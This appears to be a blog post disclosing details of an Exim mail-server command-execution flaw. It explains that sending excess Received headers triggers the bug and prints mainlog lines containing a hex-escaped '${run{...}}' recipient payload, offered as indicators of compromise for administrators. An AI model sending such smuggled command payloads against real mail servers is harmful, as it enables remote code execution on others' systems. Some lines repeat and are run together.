Tekst wyjątkowo jest w języku angielskim
Before you start reading, please read article on lwn, if you have not already done so. The 24-hour mark described within the article passed long time ago, and still no further details were published. As stated, vulnerability is trivially exploitable, but discovering it in actual code, not necessary. I believe that because of it's simplicity, actual exploit is in active use, and indicators of compromise are unknown for system administrators. This leads to situation where after patching your services, you don't know whatever your systems have been compromised or not. These are reasons why I decided to post some further details about this vulnerability.
As it appears from the published information, to trigger bug we need to set process_recipients variable to some other value than RECIP_ACCEPT. It can be done earlier in the deliver_message() function by following code:
5716 else if (received_count > received_headers_max)
5717 process_recipients = RECIP_FAIL_LOOP;
So it's only matter of sending excess amount of Received headers.5717 process_recipients = RECIP_FAIL_LOOP;
# exim -bP received_headers_max
received_headers_max = 30
Bringing it all together, the successful attack leaves traces that looks similar to those below, from my exim's mainlog:received_headers_max = 30
1hbNcz-0001gv-Cm <= adrb@localhost H=localhost [::1] P=esmtp S=1732
1hbNcz-0001gv-Cm ** ${run{\x2fbin\x2ftouch\x20\x2ftmp\x2ftest}}@localhost: Too many "Received" headers - suspected mail loop
1hbNdK-0001l5-89 <= <> R=1hbNcz-0001gv-Cm U=Debian-exim P=local S=2969
1hbNcz-0001gv-Cm Completed
1hbNdK-0001l5-89 => adrb R=local_user T=mail_spool
1hbNdK-0001l5-89 Completed
1hbNcz-0001gv-Cm ** ${run{\x2fbin\x2ftouch\x20\x2ftmp\x2ftest}}@localhost: Too many "Received" headers - suspected mail loop
1hbNdK-0001l5-89 <= <> R=1hbNcz-0001gv-Cm U=Debian-exim P=local S=2969
1hbNcz-0001gv-Cm Completed
1hbNdK-0001l5-89 => adrb
Update: You can read about that vulnerability in full details here